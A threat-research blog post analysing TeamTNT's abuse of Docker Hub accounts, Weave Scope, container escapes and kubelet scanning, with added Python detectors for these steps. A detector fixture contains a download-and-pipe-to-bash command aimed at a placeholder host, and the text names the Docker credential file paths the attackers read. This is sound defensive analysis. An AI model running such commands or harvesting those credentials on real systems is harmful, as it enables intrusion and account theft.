Analyzing How TeamTNT Used Compromised Docker Hub Accounts
Following our previous disclosure of compromised Docker Hub accounts delivering cryptocurrency miners, we analyze these accounts and uncover more malicious actions that you need to be aware of.
By: Nitesh Surana
December 01, 2021
In early November, we disclosed that compromised Docker Hub accounts were being used for cryptocurrency mining and that these activities were tied to the TeamTNT threat actor. While these accounts have now been removed, we were still able to investigate TeamTNT’s activities in connection with these compromised accounts.
In addition to the behavior we noted earlier, we identified several other actions that the same threat actor carried out in different venues. One was the use of Weave Scope, a legitimate tool by Weaveworks used to monitor/control deployed containers.
Weave Scope
Weave Scope is a visualization and monitoring tool for Docker and Kubernetes. System administrators can use this to monitor and control their deployed containers/pods/workloads.
Figure 1. Weave Scope window
One can manage running containers by executing, rebooting, pausing, stopping, or even deleting containers, all of which can be controlled from a web console (either local or in the cloud).
In this attack scenario, the compromised underlying host was made a node of the threat actor-controlled Weave Scope Cloud instance, from where they could execute various commands.
Figure 2. Terminal command executed via Weave Scope
The administration features make Weave Scope an interesting target. This is how attackers targeted this recently:
1. The attacker spins up a new privileged container based on an image from a compromised account. In the arguments, the attacker attempts to mount the root file system of the underlying host to the ‘/host’ mount point and executes a bash script fetched from the attacker’s infrastructure.
Figures 3-5. Code to spin up new container
2. The script ‘scope2.sh’ is downloaded and piped to ‘bash’ to be executed. The script initially checks if the hostname’s value is ‘HaXXoRsMoPPeD’, halting the execution if true. This looks like a flag to check if a system has already been compromised.
Figure 6. Script checking for hostname
3. Environment variables are set, which override localization settings, prevent command history logging, and export a new path.
4. A variable ‘SCOPE_TOKEN’ is populated from a controlled endpoint, which contains the Weave Scope service token. ‘SCOPESHFILE’ contains the Weave Scope script, which is encoded in base64.
Figure 7. Encoded script
5. The path to the ‘docker’ binary is fetched using ‘type docker’. To evade any TTY events, they are redirected to ‘/dev/null’. Based on this, the execution proceeds.
6. The file ‘/tmp/.ws’ is checked:
a. If the file does not exist, the following commands are executed:
i. The ‘/tmp/’ path is remounted with read-write permissions using the ‘mount’ utility.
ii. The base64-encoded string of the ‘SCOPESHFILE’ variable is decoded and the output is redirected to ‘/tmp/.ws’. This is the Weaveworks script and is hidden by default since the file name starts with a ‘.’.
iii. The permissions of the newly created script are changed to executable using ‘chmod’.
b. If the file ‘/tmp/.ws’ exists, then execution proceeds as follows:
i. The ‘/tmp/’ path is remounted as read-write using the ‘mount’ utility.
ii. The Weaveworks utility Weave Scope at /tmp/.ws is stopped and launched with the service token fetched in step 4.
Figure 8. Stop and relaunch of Weave Scope utility
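The container-creation request in step 1 is the earliest point at which this chain can be caught. The following is an added example, not code from the original article or from Trend Micro: it reviews the JSON body of a Docker Engine API container-create request for the three traits described above (privileged mode, the host root bind-mounted read-write, and a command that pipes a downloaded script into a shell). The sample bodies, image names and the ‘example.invalid’ host are constructed placeholders.

```python
import json
import re

# A download whose output is piped straight into a shell, e.g. "curl ... | bash".
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da|z)?sh\b")


def _as_list(value):
    """The API accepts Cmd/Entrypoint as a string or a list of strings."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def writable_host_root_targets(host_config):
    """Container paths where the host's '/' is bind-mounted read-write."""
    targets = []
    for bind in host_config.get("Binds") or []:
        parts = bind.split(":")  # "src:dst[:options]"
        options = parts[2].split(",") if len(parts) > 2 else []
        if len(parts) >= 2 and parts[0] == "/" and "ro" not in options:
            targets.append(parts[1])
    for mount in host_config.get("Mounts") or []:
        if (mount.get("Type") == "bind" and mount.get("Source") == "/"
                and not mount.get("ReadOnly", False)):
            targets.append(mount.get("Target", ""))
    return targets


def review_create_request(body):
    """Return findings for one container-create JSON body."""
    spec = json.loads(body)
    host_config = spec.get("HostConfig") or {}
    findings = []
    if host_config.get("Privileged"):
        findings.append("privileged container")
    for target in writable_host_root_targets(host_config):
        findings.append(f"host root mounted read-write at {target}")
    command = " ".join(_as_list(spec.get("Entrypoint")) + _as_list(spec.get("Cmd")))
    if PIPE_TO_SHELL.search(command):
        findings.append("command pipes a downloaded script into a shell")
    return findings


# Constructed sample bodies (not captured traffic); the host is a placeholder.
SUSPICIOUS = json.dumps({
    "Image": "example/image:latest",
    "Cmd": ["sh", "-c", "curl -s http://example.invalid/scope2.sh | bash"],
    "HostConfig": {"Privileged": True, "Binds": ["/:/host"]},
})
BENIGN = json.dumps({
    "Image": "nginx:stable",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
})
```

A read-only bind of the host root is deliberately not reported by this check, matching the "with Write Permission" wording of the network rule listed later; a stricter policy may flag it as well.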
Weaveworks published a blog post in September 2020 that shared best practices for securing Weave Scope. Unfortunately, the abuse of this legitimate tool is still quite prevalent.
Trend Micro Solutions
Cloud One Workload Security™
When a new container is created over the Docker daemon’s REST API, the rule ‘1010326 – Identified Docker Daemon Remote API Call’ triggers with different notes for different steps of the container creation from image.
Events are generated when the ‘containerd’ process is created and are logged using the Integrity Monitoring module:
Figure 9. Alert for containerd process
When the Docker daemon is observed listening on a TCP port, the Log Inspection module detects this as seen below:
Figure 10. Results of Log Inspection module
The AntiMalware Module detects the malicious script ‘scope2.sh’ as a Trojan:
Figure 11. Detection of malicious script
Intrusion Prevention
1010326 – Identified Docker Daemon Remote API Call
1010561 – Identified Kubernetes Unprotected Primary Channel Information Disclosure
1010762 – Identified Kubernetes API Server LoadBalancer Status Patch Request
1010769 – Identified Kubernetes Namespace API Requests
1009493 – Kubernetes Dashboard Authentication Bypass Information Disclosure Vulnerability (CVE-2018-18264)
1009450 – Kubernetes API Proxy Request Handling Privilege Escalation Vulnerability (CVE-2018-1002105)
1009561 – Kubernetes API Server Denial of Service Vulnerability (CVE-2019-1002100)
Log Inspection
1009105 – Kubernetes
1008619 – Application – Docker
1010349 – Docker Daemon Remote API Calls
Integrity Monitoring
1008271 – Application – Docker
1009060 – Application – Kubernetes Cluster master
1009434 – Application – Kubernetes Cluster node
Cloud One Network Security™
The following rules are triggered by this attack in Network Security:
29993: HTTP: Docker Container With Root Directory Mounted with Write Permission Creation Attempt
33719: HTTP: Docker Daemon “create/exec” API with “Cmd” Key Set to Execute Shell Commands
33905: HTTP: Kubernetes API Proxy Request Handling Privilege Escalation Vulnerability
34487: HTTP: Kubernetes Dashboard Authentication Bypass Vulnerability
34488: HTTPS: Kubernetes Dashboard Authentication Bypass Vulnerability
34668: HTTP: Docker Build Image API Request with remote and networkmode Parameters Set
34796: HTTP: Docker Version API Check Request
35799: HTTP: Kubernetes Overlength json-patch Request
38836: HTTP: Kubernetes API Namespaces Request
38837: HTTP: Kubernetes API Namespaces Status Request
38838: HTTP: Kubernetes API Create Namespace Request
38839: HTTP: Kubernetes API Delete Namespace Request
38840: HTTP: Kubernetes API Update Namespace Request
38847: HTTP: Kubernetes API Server loadBalancer Status Patch Request
38892: HTTP: Kubernetes API Admission Control Create Mutating Webhook Request
38893: HTTP: Kubernetes API Admission Control Create Validating Webhook Request
38896: HTTP: Kubernetes API Admission Control Resources Request
38898: HTTP: Kubernetes API Admission Control List Mutating Webhook Configurations Request
38899: HTTP: Kubernetes API Admission Control List Validating Webhook Configurations Request
38901: HTTP: Kubernetes API Admission Control Delete Validating Webhook Request
38902: HTTP: Kubernetes API Admission Control Delete Mutating Webhook Request
38903: HTTP: Kubernetes API Admission Control Update Validating Webhook Request
38904: HTTP: Kubernetes API Admission Control Update Mutating Webhook Request
38905: HTTP: Kubernetes API Admission Control Read Mutating Webhook Request
38906: HTTP: Kubernetes API Admission Control Read Validating Webhook Request
38907: HTTP: Kubernetes API Admission Control Replace Mutating Webhook Request
38908: HTTP: Kubernetes API Admission Control Replace Validating Webhook Request
38909: HTTP: Kubernetes API CustomResourceDefinition Resources Request
38910: HTTP: Kubernetes API Create CustomResourceDefinition Request
38916: HTTP: Kubernetes API List CustomResourceDefinition Resources Request
38917: HTTP: Kubernetes API Update CustomResourceDefinition Resources Request
38918: HTTP: Kubernetes API Update Status CustomResourceDefinition Resources Request
38919: HTTP: Kubernetes API Read CustomResourceDefinition Resources Request
Trend Micro Vision One™
Figure 12. Detection Model for Weave Scope abuse
Since Weave Scope is a legitimate tool used in workloads, one can enable or disable the XDR Model from Detection Model Management by toggling the ‘Status’. If the tool is not intended to be used in the environment and there are alerts as XDR Model triggers or Observed Attack Techniques, it must be checked.
Workbench
Figure 13. Workbench diagram
The diagram in Figure 13 demonstrates the power of correlation among different Cloud One™ modules, composed into a single screen. The left panel shows the sequence of observed attack techniques with the events generated from Cloud One™ modules, while the right panel details the various objects involved in this attempt. The corresponding MITRE ATT&CK tags help identify the parts of the framework being abused.
Figure 14. Workbench diagram
This Workbench shows all the workloads using the Impact Scope in the organization where the unencrypted Docker REST API is exposed and on which it is listening.
Root Cause Analysis
Figures 15 and 16. Root cause analysis diagrams
In the RCAs generated from the Observed Attack Techniques, we can deep dive into the various fields of importance, such as the exact time at which the outbound connection was observed and the process lineage with the process command line. This shows that ‘nsenter’ is being executed from ‘scope’, it is being used to create a ‘bash’ shell, and the context is fetched from the PID 1 or ‘init’ process responsible for starting and shutting down the system.
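The process lineage described above can be turned into a hunting rule. This is an added example, not Trend Micro's detection logic: it scans process-creation events for an ‘nsenter’ that targets PID 1, launches a shell, and has ‘scope’ among its ancestors. The event field names (pid, ppid, name, cmdline) and the sample events are assumptions constructed for illustration.

```python
import shlex

SHELLS = {"sh", "bash", "dash", "zsh"}


def nsenter_target(argv):
    """Return the PID passed to nsenter's -t/--target option, or None."""
    for i, arg in enumerate(argv):
        if arg in ("-t", "--target") and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--target="):
            return arg.split("=", 1)[1]
        if arg.startswith("-t") and arg[2:].isdigit():
            return arg[2:]
    return None


def ancestors(pid, by_pid):
    """Yield parent, grandparent, ... of pid; stops on unknown PIDs or loops."""
    seen = set()
    ppid = by_pid[pid]["ppid"] if pid in by_pid else None
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        yield by_pid[ppid]
        ppid = by_pid[ppid]["ppid"]


def find_scope_host_shells(events):
    """Return PIDs of nsenter processes that match the lineage above."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        argv = shlex.split(event["cmdline"])
        if event["name"] != "nsenter" or nsenter_target(argv) != "1":
            continue
        runs_shell = any(a.rsplit("/", 1)[-1] in SHELLS for a in argv[1:])
        from_scope = any(p["name"] == "scope"
                         for p in ancestors(event["pid"], by_pid))
        if runs_shell and from_scope:
            alerts.append(event["pid"])
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1, "name": "scope", "cmdline": "scope"},
    {"pid": 4210, "ppid": 4100, "name": "nsenter",
     "cmdline": "nsenter -t 1 -m -u -i -n -p bash"},      # matches
    {"pid": 4300, "ppid": 4100, "name": "nsenter",
     "cmdline": "nsenter -t 4222 -n ip addr"},            # target is not PID 1
    {"pid": 5000, "ppid": 1, "name": "sshd", "cmdline": "sshd"},
    {"pid": 5010, "ppid": 5000, "name": "nsenter",
     "cmdline": "nsenter --target=1 -m /bin/bash"},       # not spawned by scope
]
```

Where Weave Scope is deployed intentionally, its host-shell feature produces the same lineage, so alerts from this rule need to be matched against approved use.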
Escaping from a compromised container
Based on our research, the attackers also used a well-known technique to escape from a compromised container to the host. They did this by using bind mounts and fetching the Docker Hub credentials from the following paths:
/root/.docker/config.json
/home/*/.docker/config.json
As per Docker’s official documentation:
“You can log into any public or private repository for which you have credentials. When you log in, the command stores credentials in $HOME/.docker/config.json on Linux or %USERPROFILE%/.docker/config.json”.
When someone logs into their Docker Hub account using the Docker command line and there are no credential stores specified, the username, password, and registry server link are populated as a JSON that looks like this:
Figure 17. Code with Docker login
By default, the registry used is that of Docker Inc. The value of the ‘auths.auth’ field is the base64-encoded string that contains the credentials in the format ‘username:password’. If these credentials are compromised, one can gain access to the victims’ information:
Email ID used to create the account
Private images
Access tokens
Slack Webhooks
Content subscriptions
Upgraded features
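Because the ‘auth’ value is only base64-encoded, any config.json that carries it exposes the account to whoever can read the file. The following is an added example, not code from the original article: it audits the contents of Docker client config files and reports which registries still hold an inline credential, returning only the registry and username and never the password. The file paths mirror the ones listed above; the file contents, the user names ‘alice’ and ‘bob’, and the password are constructed.

```python
import base64
import binascii
import json


def inline_credentials(config_text):
    """Return (registry, username) for each credential stored inline."""
    config = json.loads(config_text)
    found = []
    for registry, entry in (config.get("auths") or {}).items():
        token = (entry or {}).get("auth")
        if not token:
            continue  # empty entry: the secret lives in a credential store
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            found.append((registry, "<undecodable>"))
            continue
        username, sep, _password = decoded.partition(":")
        found.append((registry, username if sep else "<malformed>"))
    return found


def audit(files):
    """Map each config path to its inline credentials; clean files are omitted."""
    report = {}
    for path, text in files.items():
        hits = inline_credentials(text)
        if hits:
            report[path] = hits
    return report


# Constructed sample file contents (not real credentials).
_TOKEN = base64.b64encode(b"alice:example-password").decode("ascii")
SAMPLE_FILES = {
    # Logged in with no credential store configured: secret is inline.
    "/root/.docker/config.json": json.dumps(
        {"auths": {"https://index.docker.io/v1/": {"auth": _TOKEN}}}),
    # Logged in with a credential store: the auths entry is empty.
    "/home/bob/.docker/config.json": json.dumps(
        {"auths": {"https://index.docker.io/v1/": {}}, "credsStore": "pass"}),
}

if __name__ == "__main__":
    for path, hits in audit(SAMPLE_FILES).items():
        for registry, user in hits:
            print(f"{path}: inline credential for {user} at {registry}")
```

Any account reported here should have its password rotated and be moved to a credential store, since a container with the host file system mounted can read these files directly.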
Now we take a look into how the enumeration of exposed kubelets was performed.
Enumeration of Exposed Kubelets
This attack abused the Docker REST API to create a container from an image that had a script on the filesystem path ‘/root/init.sh’, which contains the following:
1. They initially update the alpine-based container and add the packages they need in later operations, like compiling zgrab from source, using masscan, etc.
Figure 18. Building zgrab
2. Once the above steps are executed, they begin the execution of their malicious function using a kill switch, which depends on the contents of a certain endpoint on the attacker’s infrastructure to be equal to ‘RUN’.
Figure 19. Executing malicious functions
3. Once the kill switch is confirmed to be equal to ‘RUN’, the malicious PWN function is executed.
Figure 20. Checking for the kill switch
This script fetches a scan range from a malicious server endpoint. If the results fetched contain ‘ENDE’, that signals the exit of the malicious script.
The result returned by the endpoint is stored in the variable ‘SCAN_RANGE’, to which ‘.0.0.0/8’ is later appended. For example, if the value returned from the endpoint is 10, then the value of ‘SCAN_RANGE’ will be ‘10.0.0.0/8’.
The variable ‘rndstr’ is a six-letter random alphabetical string that accumulates a list of IP addresses of running pods with the kubelet API TCP port 10250 exposed that have been found using masscan and zgrab. Once this subnet is completed, the results are sent back to the threat actor using a for loop, which iterates over the results obtained via a website.
Once the results are sent, the kill switch loop loops back for a new subnet from the infrastructure unless all the subnets are enumerated.
The threat actor seems to do this as preparation to later target exposed kubelets. Earlier, we detailed the shift in focus from Docker REST API to Kubernetes API. Here’s the growth of exposed Kubernetes API port 10250 indexed by Shodan, from roughly 1,200 exposed workloads months ago:
Figure 21. Growth in exposed port 10250
Trend Micro Solutions
Cloud One Workload Security™
Intrusion Prevention
1010326 – Identified Docker Daemon Remote API Call
1010561 – Identified Kubernetes Unprotected Primary Channel Information Disclosure
1010762 – Identified Kubernetes API Server LoadBalancer Status Patch Request
1010769 – Identified Kubernetes Namespace API Requests
1009493 – Kubernetes Dashboard Authentication Bypass Information Disclosure Vulnerability (CVE-2018-18264)
1009450 – Kubernetes API Proxy Request Handling Privilege Escalation Vulnerability (CVE-2018-1002105)
1009561 – Kubernetes API Server Denial of Service Vulnerability (CVE-2019-1002100)
Log Inspection
1009105 – Kubernetes
1008619 – Application – Docker
1010349 – Docker Daemon Remote API Calls
Integrity Monitoring
1008271 – Application – Docker
1009060 – Application – Kubernetes Cluster master
1009434 – Application – Kubernetes Cluster node
Cloud One Network Security™
29993: HTTP: Docker Container With Root Directory Mounted with Write Permission Creation Attempt
33719: HTTP: Docker Daemon “create/exec” API with “Cmd” Key Set to Execute Shell Commands
33905: HTTP: Kubernetes API Proxy Request Handling Privilege Escalation Vulnerability
34487: HTTP: Kubernetes Dashboard Authentication Bypass Vulnerability
34488: HTTPS: Kubernetes Dashboard Authentication Bypass Vulnerability
34668: HTTP: Docker Build Image API Request with remote and networkmode Parameters Set
34796: HTTP: Docker Version API Check Request
35799: HTTP: Kubernetes Overlength json-patch Request
38836: HTTP: Kubernetes API Namespaces Request
38837: HTTP: Kubernetes API Namespaces Status Request
38838: HTTP: Kubernetes API Create Namespace Request
38839: HTTP: Kubernetes API Delete Namespace Request
38840: HTTP: Kubernetes API Update Namespace Request
38847: HTTP: Kubernetes API Server loadBalancer Status Patch Request
38892: HTTP: Kubernetes API Admission Control Create Mutating Webhook Request
38893: HTTP: Kubernetes API Admission Control Create Validating Webhook Request
38896: HTTP: Kubernetes API Admission Control Resources Request
38898: HTTP: Kubernetes API Admission Control List Mutating Webhook Configurations Request
38899: HTTP: Kubernetes API Admission Control List Validating Webhook Configurations Request
38901: HTTP: Kubernetes API Admission Control Delete Validating Webhook Request
38902: HTTP: Kubernetes API Admission Control Delete Mutating Webhook Request
38903: HTTP: Kubernetes API Admission Control Update Validating Webhook Request
38904: HTTP: Kubernetes API Admission Control Update Mutating Webhook Request
38905: HTTP: Kubernetes API Admission Control Read Mutating Webhook Request
38906: HTTP: Kubernetes API Admission Control Read Validating Webhook Request
38907: HTTP: Kubernetes API Admission Control Replace Mutating Webhook Request
38908: HTTP: Kubernetes API Admission Control Replace Validating Webhook Request
38909: HTTP: Kubernetes API CustomResourceDefinition Resources Request
38910: HTTP: Kubernetes API Create CustomResourceDefinition Request
38916: HTTP: Kubernetes API List CustomResourceDefinition Resources Request
38917: HTTP: Kubernetes API Update CustomResourceDefinition Resources Request
38918: HTTP: Kubernetes API Update Status CustomResourceDefinition Resources Request
38919: HTTP: Kubernetes API Read CustomResourceDefinition Resources Request
Conclusion
Vulnerabilities posed by poor security misconfigurations or inherent software bugs are difficult to protect against. In the above case, we saw the use of legitimate platforms like Weaveworks. To stay protected, we need to rethink how we build security into our daily work through regular patching and by staying updated and alert to the latest happenings in cyberspace.
Trend Micro™ Cloud One™ – Workload Security equips defenders and analysts with the ability to protect systems against vulnerabilities, exploits, and malware, offering protection from on-premise to cloud workloads. Virtual patching can protect critical systems even before the official patches are made available.
Trend Micro™ Vision One™ provides a clear view of the most important events as alerts in a concise manner, because the race is about quick response. With XDR capabilities and telemetry from your multi-cloud environments or on-premise workloads, security teams get a clear and vivid understanding of what to prioritize.
Indicators Of Compromise
IP address
Domain
Shell scripts
Hash
Detection Name
7c110dc507ed4e2694500c7c37fe9176e9f4db23bc4753c0bfc9f3479eb6385a
Trojan.SH.MALXMR.UWELG
b7cef848b61cfb7d667e60ade3a1781def69f5395b5ad6a2a16f7b7fa11ef1db
Trojan.Win32.FRS.VSNW0CK21